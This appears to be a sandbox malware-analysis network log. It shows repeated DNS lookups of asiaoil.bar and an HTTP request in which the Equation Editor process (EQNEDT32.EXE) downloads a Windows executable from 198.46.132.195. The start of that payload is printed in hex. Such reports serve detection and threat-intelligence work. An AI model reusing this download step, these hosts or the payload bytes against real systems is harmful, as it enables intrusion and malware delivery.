                        Feb 10, 2022 10:23:17.382666111 CET192.168.2.228.8.8.80xc2e1Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:18.736026049 CET192.168.2.228.8.8.80xb066Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:19.799702883 CET192.168.2.228.8.8.80x3e8aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:20.931313992 CET192.168.2.228.8.8.80x38cfStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:22.033031940 CET192.168.2.228.8.8.80x3dc9Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:23.098339081 CET192.168.2.228.8.8.80x38abStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:25.154160023 CET192.168.2.228.8.8.80xeadStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:26.716438055 CET192.168.2.228.8.8.80xf593Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:27.763015032 CET192.168.2.228.8.8.80x32eeStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:28.759797096 CET192.168.2.228.8.8.80x4a27Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:29.753248930 CET192.168.2.228.8.8.80x7d68Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:30.760308981 CET192.168.2.228.8.8.80x9f6eStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:31.802032948 CET192.168.2.228.8.8.80x3040Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:32.823729992 CET192.168.2.228.8.8.80xd8f9Standard query (0)asiaoil.barA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Feb 10, 2022 10:21:59.679673910 CET8.8.8.8192.168.2.220x9747No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:21:59.679673910 CET8.8.8.8192.168.2.220x9747No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:02.820064068 CET8.8.8.8192.168.2.220x71fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:02.820064068 CET8.8.8.8192.168.2.220x71fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:03.806817055 CET8.8.8.8192.168.2.220xa539No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:03.806817055 CET8.8.8.8192.168.2.220xa539No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:04.893670082 CET8.8.8.8192.168.2.220xa7ceNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:04.893670082 CET8.8.8.8192.168.2.220xa7ceNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:05.933922052 CET8.8.8.8192.168.2.220xe425No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:05.933922052 CET8.8.8.8192.168.2.220xe425No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:06.985570908 CET8.8.8.8192.168.2.220x51a3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:06.985570908 CET8.8.8.8192.168.2.220x51a3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:08.106977940 CET8.8.8.8192.168.2.220x49f3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:08.106977940 CET8.8.8.8192.168.2.220x49f3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:09.252610922 CET8.8.8.8192.168.2.220x2021No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:09.252610922 CET8.8.8.8192.168.2.220x2021No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:10.394609928 CET8.8.8.8192.168.2.220xe478No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:10.394609928 CET8.8.8.8192.168.2.220xe478No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:11.461467028 CET8.8.8.8192.168.2.220xd27fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:11.461467028 CET8.8.8.8192.168.2.220xd27fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:12.531579971 CET8.8.8.8192.168.2.220xa6adNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:12.531579971 CET8.8.8.8192.168.2.220xa6adNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:13.606112957 CET8.8.8.8192.168.2.220x1d7bNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:13.606112957 CET8.8.8.8192.168.2.220x1d7bNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:14.763432026 CET8.8.8.8192.168.2.220xc406No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:14.763432026 CET8.8.8.8192.168.2.220xc406No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:15.859421015 CET8.8.8.8192.168.2.220x45dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:15.859421015 CET8.8.8.8192.168.2.220x45dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:17.201698065 CET8.8.8.8192.168.2.220xb6dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:17.201698065 CET8.8.8.8192.168.2.220xb6dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:18.564426899 CET8.8.8.8192.168.2.220xbbf0No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:18.564426899 CET8.8.8.8192.168.2.220xbbf0No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:20.282020092 CET8.8.8.8192.168.2.220x795eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:20.282020092 CET8.8.8.8192.168.2.220x795eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:21.349742889 CET8.8.8.8192.168.2.220xeeebNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:21.349742889 CET8.8.8.8192.168.2.220xeeebNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:22.469295979 CET8.8.8.8192.168.2.220xe527No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:22.469295979 CET8.8.8.8192.168.2.220xe527No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:23.484388113 CET8.8.8.8192.168.2.220xfad8No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:23.484388113 CET8.8.8.8192.168.2.220xfad8No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:24.567791939 CET8.8.8.8192.168.2.220xc89cNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:24.567791939 CET8.8.8.8192.168.2.220xc89cNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:25.572346926 CET8.8.8.8192.168.2.220xe031No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:25.572346926 CET8.8.8.8192.168.2.220xe031No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:26.651072025 CET8.8.8.8192.168.2.220x61b1No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:26.651072025 CET8.8.8.8192.168.2.220x61b1No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:27.667135954 CET8.8.8.8192.168.2.220xe5e0No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:27.667135954 CET8.8.8.8192.168.2.220xe5e0No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:29.064960003 CET8.8.8.8192.168.2.220x1048No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:29.064960003 CET8.8.8.8192.168.2.220x1048No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:30.776675940 CET8.8.8.8192.168.2.220x5557No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:30.776675940 CET8.8.8.8192.168.2.220x5557No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:31.858690977 CET8.8.8.8192.168.2.220x74efNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:31.858690977 CET8.8.8.8192.168.2.220x74efNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:32.930648088 CET8.8.8.8192.168.2.220x14c8No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:32.930648088 CET8.8.8.8192.168.2.220x14c8No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:33.985292912 CET8.8.8.8192.168.2.220x860fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:33.985292912 CET8.8.8.8192.168.2.220x860fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:35.035057068 CET8.8.8.8192.168.2.220xfea3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:35.035057068 CET8.8.8.8192.168.2.220xfea3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:36.052189112 CET8.8.8.8192.168.2.220x2516No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:36.052189112 CET8.8.8.8192.168.2.220x2516No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:37.097563982 CET8.8.8.8192.168.2.220xff8aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:37.097563982 CET8.8.8.8192.168.2.220xff8aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:38.148770094 CET8.8.8.8192.168.2.220x7ac5No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:38.148770094 CET8.8.8.8192.168.2.220x7ac5No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:39.203105927 CET8.8.8.8192.168.2.220xb649No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:39.203105927 CET8.8.8.8192.168.2.220xb649No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:40.399499893 CET8.8.8.8192.168.2.220x55b7No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:40.399499893 CET8.8.8.8192.168.2.220x55b7No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:41.416198015 CET8.8.8.8192.168.2.220x9913No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:41.416198015 CET8.8.8.8192.168.2.220x9913No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:42.509901047 CET8.8.8.8192.168.2.220xd5cfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:42.509901047 CET8.8.8.8192.168.2.220xd5cfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:43.524178982 CET8.8.8.8192.168.2.220xe474No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:43.524178982 CET8.8.8.8192.168.2.220xe474No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:44.563961983 CET8.8.8.8192.168.2.220xd627No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:44.563961983 CET8.8.8.8192.168.2.220xd627No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:45.620157957 CET8.8.8.8192.168.2.220xffb2No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:45.620157957 CET8.8.8.8192.168.2.220xffb2No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:46.698565960 CET8.8.8.8192.168.2.220x24d3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:46.698565960 CET8.8.8.8192.168.2.220x24d3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:47.712665081 CET8.8.8.8192.168.2.220x664bNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:47.712665081 CET8.8.8.8192.168.2.220x664bNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:48.813474894 CET8.8.8.8192.168.2.220xc7a4No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:48.813474894 CET8.8.8.8192.168.2.220xc7a4No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:49.878983974 CET8.8.8.8192.168.2.220x3468No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:49.878983974 CET8.8.8.8192.168.2.220x3468No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:51.019309044 CET8.8.8.8192.168.2.220xfa95No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:51.019309044 CET8.8.8.8192.168.2.220xfa95No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:52.041841030 CET8.8.8.8192.168.2.220xd853No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:52.041841030 CET8.8.8.8192.168.2.220xd853No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:53.123905897 CET8.8.8.8192.168.2.220xc5beNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:53.123905897 CET8.8.8.8192.168.2.220xc5beNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:54.186261892 CET8.8.8.8192.168.2.220x412aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:54.186261892 CET8.8.8.8192.168.2.220x412aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:55.202280998 CET8.8.8.8192.168.2.220x6266No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:55.202280998 CET8.8.8.8192.168.2.220x6266No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:56.214804888 CET8.8.8.8192.168.2.220xfd14No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:56.214804888 CET8.8.8.8192.168.2.220xfd14No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:57.333787918 CET8.8.8.8192.168.2.220x8b69No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:57.333787918 CET8.8.8.8192.168.2.220x8b69No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:58.417352915 CET8.8.8.8192.168.2.220xe59eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:58.417352915 CET8.8.8.8192.168.2.220xe59eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:59.519994974 CET8.8.8.8192.168.2.220x3e6No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:22:59.519994974 CET8.8.8.8192.168.2.220x3e6No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:00.533606052 CET8.8.8.8192.168.2.220x37b5No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:00.533606052 CET8.8.8.8192.168.2.220x37b5No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:01.595443010 CET8.8.8.8192.168.2.220x92dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:01.595443010 CET8.8.8.8192.168.2.220x92dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:02.604903936 CET8.8.8.8192.168.2.220xdcc3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:02.604903936 CET8.8.8.8192.168.2.220xdcc3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:03.649529934 CET8.8.8.8192.168.2.220x5c5aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:03.649529934 CET8.8.8.8192.168.2.220x5c5aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:04.640897036 CET8.8.8.8192.168.2.220x314dNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:04.640897036 CET8.8.8.8192.168.2.220x314dNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:05.934077978 CET8.8.8.8192.168.2.220x18fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:05.934077978 CET8.8.8.8192.168.2.220x18fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:08.573890924 CET8.8.8.8192.168.2.220xb372No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:08.573890924 CET8.8.8.8192.168.2.220xb372No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:09.647778988 CET8.8.8.8192.168.2.220x7447No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:09.647778988 CET8.8.8.8192.168.2.220x7447No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:10.689938068 CET8.8.8.8192.168.2.220xebcfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:10.689938068 CET8.8.8.8192.168.2.220xebcfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:11.726572037 CET8.8.8.8192.168.2.220x56b2No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:11.726572037 CET8.8.8.8192.168.2.220x56b2No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:12.805661917 CET8.8.8.8192.168.2.220x8d8dNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:12.805661917 CET8.8.8.8192.168.2.220x8d8dNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:13.894022942 CET8.8.8.8192.168.2.220xdd5aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:13.894022942 CET8.8.8.8192.168.2.220xdd5aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:14.907351017 CET8.8.8.8192.168.2.220xca3fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:14.907351017 CET8.8.8.8192.168.2.220xca3fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:16.148524046 CET8.8.8.8192.168.2.220xe624No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:16.148524046 CET8.8.8.8192.168.2.220xe624No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:17.401235104 CET8.8.8.8192.168.2.220xc2e1No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:17.401235104 CET8.8.8.8192.168.2.220xc2e1No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:18.763688087 CET8.8.8.8192.168.2.220xb066No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:18.763688087 CET8.8.8.8192.168.2.220xb066No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:19.818831921 CET8.8.8.8192.168.2.220x3e8aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:19.818831921 CET8.8.8.8192.168.2.220x3e8aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:20.950112104 CET8.8.8.8192.168.2.220x38cfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:20.950112104 CET8.8.8.8192.168.2.220x38cfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:22.051954985 CET8.8.8.8192.168.2.220x3dc9No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:22.051954985 CET8.8.8.8192.168.2.220x3dc9No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:23.115072966 CET8.8.8.8192.168.2.220x38abNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:23.115072966 CET8.8.8.8192.168.2.220x38abNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:25.172872066 CET8.8.8.8192.168.2.220xeadNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:25.172872066 CET8.8.8.8192.168.2.220xeadNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:26.735743999 CET8.8.8.8192.168.2.220xf593No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:26.735743999 CET8.8.8.8192.168.2.220xf593No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:27.781708956 CET8.8.8.8192.168.2.220x32eeNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:27.781708956 CET8.8.8.8192.168.2.220x32eeNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:28.778294086 CET8.8.8.8192.168.2.220x4a27No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:28.778294086 CET8.8.8.8192.168.2.220x4a27No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:29.769979954 CET8.8.8.8192.168.2.220x7d68No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:29.769979954 CET8.8.8.8192.168.2.220x7d68No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:30.778796911 CET8.8.8.8192.168.2.220x9f6eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:30.778796911 CET8.8.8.8192.168.2.220x9f6eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:31.820941925 CET8.8.8.8192.168.2.220x3040No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:31.820941925 CET8.8.8.8192.168.2.220x3040No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:32.840801001 CET8.8.8.8192.168.2.220xd8f9No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                        Feb 10, 2022 10:23:32.840801001 CET8.8.8.8192.168.2.220xd8f9No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • 198.46.132.195
                        • asiaoil.bar

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.2249165198.46.132.19580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:21:50.261872053 CET0OUTGET /windowSSH/.win32.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 198.46.132.195
                        Connection: Keep-Alive
                        Feb 10, 2022 10:21:50.385209084 CET1INHTTP/1.1 200 OK
                        Date: Thu, 10 Feb 2022 09:21:50 GMT
                        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                        Last-Modified: Thu, 10 Feb 2022 03:31:37 GMT
                        ETag: "480d4-5d7a1966fd8a9"
                        Accept-Ranges: bytes
                        Content-Length: 295124
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 